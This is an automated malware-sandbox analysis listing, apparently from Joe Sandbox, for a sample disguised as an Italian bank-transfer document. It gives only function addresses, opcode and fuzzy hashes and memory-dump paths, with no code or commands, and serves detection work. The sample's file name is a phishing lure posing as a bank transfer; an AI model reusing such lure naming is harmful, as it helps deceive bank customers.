                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                  • Instruction ID: 5d097999a57bb0ec832fee66cea6d749d22e2f30ee69f6e72e68bdb60a80dbd6
                                  • Opcode Fuzzy Hash: cbfc33f5c8b78708087ebaf6ecf5901cfc3e6b3a3252fe01053b9d7049f62d6b
                                  • Instruction Fuzzy Hash: 1131EDB5506341CFCB19DF19C5809AABBF9FF89614F444AAEE4889B305D332D961CB82
                                  Function 010E438F Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                  • Instruction ID: d12afa390cb433db154ab123a81b2cd83961903f1c37b814c6eaee3c5423c4d4
                                  • Opcode Fuzzy Hash: 51a3e46f46db1d120cf0eef2466e19154dbc27ec6fe0bfce8b866bb62a9e6d4a
                                  • Instruction Fuzzy Hash: 7B31D671B003059FD728EFBAC985A6E77F9AB94304F008529D586D7254DB30EA41CB90
                                  Function 010BCB7E Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction ID: 7717847a144bd21ec54219fe3453de25713e94cb343927eac7963c4ede0bfd29
                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction Fuzzy Hash: 0F210672E1525AAADB159BB98851BEFFBB5AF14740F058035DE55EB340E370D90087A0
                                  Function 010BC156 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                  • Instruction ID: 8de8f3e8ac183e750ad337020f1662223ff0105d859e4aff6ea238c33412b9c7
                                  • Opcode Fuzzy Hash: f5b934a7346820704224e90291cb92a84e106dd97b02a5f5c8d576f0e38fdb81
                                  • Instruction Fuzzy Hash: F7315BB15003018BDF29AF68DC85BA9B7B4AF50308F4486B9DD859B346EB34D981CB90
                                  Function 0117C3CD Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction ID: c2ac4f6f6583e1b2f5906a39cc99fb821f59077c983d4f0dcce3c219897ccaf6
                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction Fuzzy Hash: FB21FB36A00657A6CB19AF95C800FFBBBB5EF90714F40841AFA968B791E734D950C7E0
                                  Function 010BE420 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                  • Instruction ID: 786a6434da520eb743ee60fd84cb29bc53240ccac7eb2219906b8579242301d4
                                  • Opcode Fuzzy Hash: 723ba7e82ff396abddc595a0d20d750c8e778aafb5a450057b7d0a00fcb16c47
                                  • Instruction Fuzzy Hash: 0C31D731A0152C9BDB35DF18CC81FEE77B9EB15740F0101E5E685AB290DBB49E808FA1
                                  Function 010F4588 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction ID: 5ed17e5a34a9104b537f0b5c6b27f2edfc346864b8a2ee47b89103cb4a181b30
                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction Fuzzy Hash: 25219F32A00609EBCB15CF58C981A8FBBF5FF4C714F148069EE59DB641D671EA058B90
                                  Function 010F44B0 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                  • Instruction ID: 65a9288ee06b520cd82baea4bbed47fd7336ebcaecef6f57db13e654d6fb0eee
                                  • Opcode Fuzzy Hash: 8f570806325226f5ad7f483300ddb8a3d02364fc53c6adcdbb191a2be41bb42c
                                  • Instruction Fuzzy Hash: CB21B1726047499BC722DF58C885B6BB7E4FF88B60F05451DFE949BA42D730E9008BA2
                                  Function 010BE388 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction ID: c4134f81ff37fa63eb77521cfda286cecd056bacbad9b920bdf628c39672363a
                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction Fuzzy Hash: 5231AB31600605EFDB25DF68C888FAAB7F9FF45354F1045A9E5928B281E730EE02CB51
                                  Function 0113E609 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                  • Instruction ID: 6a5bd998a699d74a4d9625cce87086a8f57b9e610d7f6408371f52bc6df3d463
                                  • Opcode Fuzzy Hash: 59a6891e7634f794a54a6bc65e9c2e35a0096093a4e1bc7c299b0b050ac1ba0e
                                  • Instruction Fuzzy Hash: E8317AB5A112069FCB1CCF18C8849AEB7B6EFD4304F154459E80A9B395E771EA50CB91
                                  Function 010C8D59 Relevance: .1, Instructions: 83COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                  • Instruction ID: bae4649b7e796f1a070c437291e59891f31655b079933403b3ef1c4500edd709
                                  • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                  • Instruction Fuzzy Hash: 082133317006D19BE72EA72CD814B6E7BF4AF40B50F0940A5EE828B6D2E7789C10CA15
                                  Function 011406F1 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                  • Instruction ID: 6357023d69b9465d2226bef9cdbd69c90548d5e0a129599e095d3ece1061c615
                                  • Opcode Fuzzy Hash: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                  • Instruction Fuzzy Hash: FA21B1719006299BCF19DF59C881AFEB7F4FF48744F400069FA81AB240D778AD41CBA1
                                  Function 0114019F Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                  • Instruction ID: 43e72a14987dbe21c9ab4bca86946e3742fea3953bfb89ab23dfa17ad3d19a61
                                  • Opcode Fuzzy Hash: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                  • Instruction Fuzzy Hash: A4218D71A00645AFD719DB69D840FAAB7A8FF48740F140069FA44DB690D734ED40CB58
                                  Function 01140283 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                  • Instruction ID: 22b7755439e8bee3f4543962b19a9ef49ba949650b79d8fb265d4f0b307e4514
                                  • Opcode Fuzzy Hash: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                  • Instruction Fuzzy Hash: 0E21B3B29083469FD715EF5AD844FDBBBDCAF94A44F08045ABE80CB291D734D904C7A2
                                  Function 010E2835 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                  • Instruction ID: d6a64d50d646dd259c3c5ff0214d8092b9d4adf31cf7c53bbdee7fa136a872b5
                                  • Opcode Fuzzy Hash: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                  • Instruction Fuzzy Hash: 92213E316457969FE326672DDD08B593BD8EF41B74F2803A0FAA09F6D2D768C8018645
                                  Function 010FA30B Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                  • Instruction ID: 0c6857260ab4de3d26283863c0b490db24973260ad516e17c248a0bbbcac711a
                                  • Opcode Fuzzy Hash: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                  • Instruction Fuzzy Hash: F0219A75200B01EBCB29DF29CD41B8677F5EF48B44F14846CA549CBB61E331E942CB94
                                  Function 01140946 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                  • Instruction ID: 9936a17f7438482dd4e4c623f04d6f7604fe21bdfcc7801aa17b71fdcb44b2aa
                                  • Opcode Fuzzy Hash: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                  • Instruction Fuzzy Hash: 5D21E9B1E01209ABCB14DFAAD9909EEFBF9FF98B10F10012EE515A7250D7709941CB54
                                  Function 011580A8 Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction ID: 3085576bed3125985f2d21acec13a3689547ad79389268e80ccbca8bdf34bd87
                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction Fuzzy Hash: 88218C72A00209EFDF169F99CC80BAEBBB9EF88310F214419F960A7251D734D9509B50
                                  Function 010F0124 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction ID: 5c3695b2a5c3d2ea004d913a34d2337dd362e3d4b15c76ba14c67bd69b442481
                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction Fuzzy Hash: F411EF72640605AFE7229B48CC82FDABBB9EB80754F10406DFB448B580D671ED44CB60
                                  Function 010C8770 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                  • Instruction ID: d16af9972b8db01f79c5c16950e6b0e8909f7c5d998afbcdfa116b6522d3f7d5
                                  • Opcode Fuzzy Hash: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                  • Instruction Fuzzy Hash: AE1193357006119FDB55CF4DC4C0A5EBBE5BF56B10B1881AEEE489F204E6B2D901CB94
                                  Function 010FAAEE Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction ID: 5d3f76459771b7126c7d6f0b754804caed7df4157e630e50eb6b10303779ba98
                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction Fuzzy Hash: EB21AC71B00609DFD7259F49C541A66BBE6EF94B10F14887DEA898BA1AC730EC00CB40
                                  Function 010C80E9 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                  • Instruction ID: 332776c5a5bff876155382ae8520d9edc1786fad6aecfc9b291faac8c167c027
                                  • Opcode Fuzzy Hash: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                  • Instruction Fuzzy Hash: 5F215E75A00205DFCB14CF58C591AAEBBF9FB88714F2481AED545AB351C771AD06CF90
                                  Function 010F674D Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                  • Instruction ID: 45c9a124a172a79779ef25ba2fe51799ca8179a039d86f152b58ad24da4e7d13
                                  • Opcode Fuzzy Hash: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                  • Instruction Fuzzy Hash: 7D218E75500B00EFD7249F68C881B6AB7F8FF84350F00882DE69AC7A50DB71A840CBA0
                                  Function 01156870 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                  • Instruction ID: b277003eb527fd8e71ce2e4ae4e14c8abac174a8f1e91bcfe8ebb8cf43e6293c
                                  • Opcode Fuzzy Hash: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                  • Instruction Fuzzy Hash: 4E11C172240605EFC76ADB69CD40F9A77B8EB59760F414025FA619B260EB70E901C7D0
                                  Function 010EE8C0 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                  • Instruction ID: 706a4f8324bc0284a93b8c0456cf0aaf71f811b7ef768164ea70cb2f1dd58dd2
                                  • Opcode Fuzzy Hash: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                  • Instruction Fuzzy Hash: C61108733001199FCB1DDB29CD85AAF72E7EBE5270F358529D922DB290EA309812C390
                                  Function 010F66B0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                  • Instruction ID: c6b3672e157b771a99c54f37a268924193b025ca1831d785a094f923512ccdcc
                                  • Opcode Fuzzy Hash: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                  • Instruction Fuzzy Hash: 2011CE76A01305EFCB29CF59C582A5ABBF8AF94610B0140BDDA859B711E630DD00CBA0
                                  Function 0118A8E4 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction ID: 536bd35d55ea2e4f3548958c5d151273fa15ab7e60f9110232840cf5d4d0dd3d
                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                  • Instruction Fuzzy Hash: C7110436A00919AFDB1DDB58C801F9EFBF5EF84214F058269E845A7340E731AD01CB80
                                  Function 010C0AD0 Relevance: .1, Instructions: 61COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction ID: 6df84fc4e33ed554317f5af5ac85bbba232307b714d7e7f2a23514273934e6d9
                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                  • Instruction Fuzzy Hash: 4821C3B5A40B459FD3A0CF29D541B56BBF4FB48B10F10492EE98AC7B50E371E854CB94
                                  Function 0114E7E1 Relevance: .1, Instructions: 59COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction ID: c380c25f406ff3fae3710d2dc0222f74b7b9dab4f09fd8e3d33ba1cea79c51c6
                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                  • Instruction Fuzzy Hash: 8111A032602602EFFF299F58C844B5ABBA5FF85B54F05842CEA499B160DB39DC40DB90
                                  Function 010E27ED Relevance: .1, Instructions: 58COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da40de213f15bad453a3f2d23be84764f49e2239ff126f78e3da6971d9de357e
                                  • Instruction ID: a9e8e7929b209393097eaef28572d8d73b1234e8676d061e533d975864764548
                                  • Opcode Fuzzy Hash: da40de213f15bad453a3f2d23be84764f49e2239ff126f78e3da6971d9de357e
                                  • Instruction Fuzzy Hash: 4401DB72606649AFE31A636EED48F6B7BDCEF40754F050075FA418B651D614DC10C6A1
                                  Function 010C4690 Relevance: .1, Instructions: 57COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b42755982e4efbb130797f6ef31ed6c74e0be866b0dfca563814ebb5066026f
                                  • Instruction ID: aa153e7104b118ab1bb980effe60e5c92be07d22743880ddf962e9ca747daaec
                                  • Opcode Fuzzy Hash: 7b42755982e4efbb130797f6ef31ed6c74e0be866b0dfca563814ebb5066026f
                                  • Instruction Fuzzy Hash: 0411AC36200645AFDB25CF59D9A0B5E7BE8FB9AB64F00425DF998CB250C371E840CF60
                                  Function 010F6620 Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1dd702b136e1fa20eb79569c767e53432991fc5439bcf196633554df2532f81b
                                  • Instruction ID: 8e2f37dca8e44ff9cf203efcba8776134bde24e96aef8bdcf075688aaf57bda0
                                  • Opcode Fuzzy Hash: 1dd702b136e1fa20eb79569c767e53432991fc5439bcf196633554df2532f81b
